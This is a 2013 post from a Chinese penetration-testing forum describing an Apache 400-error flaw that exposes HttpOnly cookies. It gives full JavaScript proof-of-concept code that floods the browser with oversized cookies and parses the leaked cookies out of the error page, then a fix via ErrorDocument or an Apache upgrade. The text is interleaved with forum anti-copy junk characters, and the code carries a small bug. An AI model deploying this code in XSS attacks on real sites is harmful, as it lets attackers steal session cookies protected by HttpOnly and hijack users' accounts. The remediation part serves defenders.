中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]
作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。2 Z( K5 ?' \) {- d+ e; E* l

" R4 g5 i* u6 \2 a7 N用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
: W4 g) I. z+ o* V$ |
& ~! U3 g, y/ u7 x, @# ~: L* u% |) q& l% U
// http://www.exploit-db.com/exploits/18442/
" r+ b7 p+ J# o; D: b( b( R$ zfunction setCookies (good) {
: g; d6 y6 }4 k8 l1 B// Construct string for cookie value8 |! T. m0 z6 R  x/ c% m9 `% G
var str = "";
$ K9 n; H3 ^) j# f, j: Sfor (var i=0; i< 819; i++) {
6 G3 @5 [' X! D: x) istr += "x";5 A& d+ _. w) }! j
}
3 k% L: o" h/ |! c4 M1 f$ q// Set cookies& u1 f& o7 C5 y& Q0 P
for (i = 0; i < 10; i++) {% G1 e" J$ f: A5 I+ b4 S- X2 _' M2 r
// Expire evil cookie1 T4 s2 I7 X% H1 I
if (good) {* }' W; H9 ^5 `. T) L
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
$ K! R" h, m) C- A% V+ o! |+ D}
) l5 z' q1 [) _1 W% X; x: R// Set evil cookie. L" u7 p6 [, ?* @+ w
else {) ]2 d% X# ^# f* y/ [- n' [! Z2 l
var cookie = "xss"+i+"="+str+";path=/";, F( v2 K" R) S+ v& q: B
}. `. `6 H% x+ J( h6 t
document.cookie = cookie;3 r( }6 i% h3 d# V6 \, U  n  s
}) F3 t) d7 b. [8 O- E
}
; A7 a: A" T: [- I3 a- D- Ofunction makeRequest() {4 V+ F& T  V( M0 M4 N8 }* }: E' Q
setCookies();- v+ m' b8 T( Q9 w7 p" V  B3 A
function parseCookies () {/ L& R$ M' b7 [* a4 _5 u
var cookie_dict = {};
0 [% a; k* Z; X$ w" L. u// Only react on 400 status6 K1 ~4 e8 B5 z; o( e
if (xhr.readyState === 4 && xhr.status === 400) {
9 |# \0 C2 s, ^5 S9 {! f1 {// Replace newlines and match <pre> content5 O( M$ a0 B% V) _% Z
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);* v, _1 J; p6 N
if (content.length) {
, r2 L: Z% U( v/ j# u// Remove Cookie: prefix
$ k; g4 Y# M$ P' W5 ?0 a/ a  q& ycontent = content[1].replace("Cookie: ", "");
  h9 f, m" Z; _& R$ h8 Evar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);6 i4 d5 B" u( T$ U4 Q2 ?! x, v
// Add cookies to object
1 L' C5 _5 S  {for (var i=0; i<cookies.length; i++) {% d  A: f. A+ ^! t! D
var s_c = cookies.split('=',2);
- n6 Q7 I" h' g; \6 f" fcookie_dict[s_c[0]] = s_c[1];: s. \! e/ _! d: y0 r: Y! n
}
. W3 R; @/ ^; x9 q}+ `3 y7 j- a# v4 E
// Unset malicious cookies( l. j; N6 K4 O" k, K4 v! `
setCookies(true);
  {* r' ~1 B5 I0 r  k3 |7 Kalert(JSON.stringify(cookie_dict));
/ U' |! n3 z% [}
& n! |  f" `! g8 \}
- d7 B  ?, T8 O) P8 ^// Make XHR request$ w3 w& D6 S3 \
var xhr = new XMLHttpRequest();( g2 f) {, x' {! _* O' F
xhr.onreadystatechange = parseCookies;
9 _4 j- g3 @) Y$ rxhr.open("GET", "/", true);
& C" K% t0 W0 I0 x: a7 gxhr.send(null);4 \  ?  B/ O/ c% C5 y; H$ m: l
}
8 z. v+ O2 H7 Q- V: A3 k+ CmakeRequest();) A  ]) N1 U+ m9 J2 r
5 s8 `4 y! k% }
你就能看见华丽丽的400错误包含着cookie信息。" D5 Z* F! \! j3 f5 R/ h! t) L

) [6 r4 s# Q5 u# F  y下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#* i' L: ^) p3 F
7 ^# `7 a+ g5 m# Q' t
修复方案:( ]0 f; G) }$ D8 ?3 `

* j8 d% E; }: |/ YApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
6 _' e- O& q& O' T! s# \+ A2 s) C- W6 c- F$ }9 Q9 m
In the event of a problem or error, Apachecan be configured to do one of four things,
5 I6 l" t  N( g! {: v+ g- R1 `- f9 u+ ]. c
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息- [4 q7 m* D/ e. g$ X
2. output acustomized message输出一段信息$ V7 z& J" j& c1 N
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
' Y9 a9 G) Q% Y8 N# U4. redirect to an external URL to handle theproblem/error转向一个外部URL: \8 H1 ?. G8 l4 E- ]( A

( |- V4 L8 B: R经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
. C; N! G4 \/ Q" d
* }! E8 ^+ A$ D& r8 O  y$ R1 kApache配置:& \" V7 T5 u6 U* b- X/ m

: _4 f# {1 G( H# N* }5 B" PErrorDocument400 " security test"
: a# x! |3 E* p6 I  C. k& M  M' v. `! y
当然,升级apache到最新也可:)。, Y7 h* S6 U5 H
/ T, c7 v/ W. G& O4 _' {1 P6 d' l9 c$ b
参考:http://httpd.apache.org/security/vulnerabilities_22.html
; X& i4 N, T7 [7 S$ Z9 d8 y4 j7 G1 Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2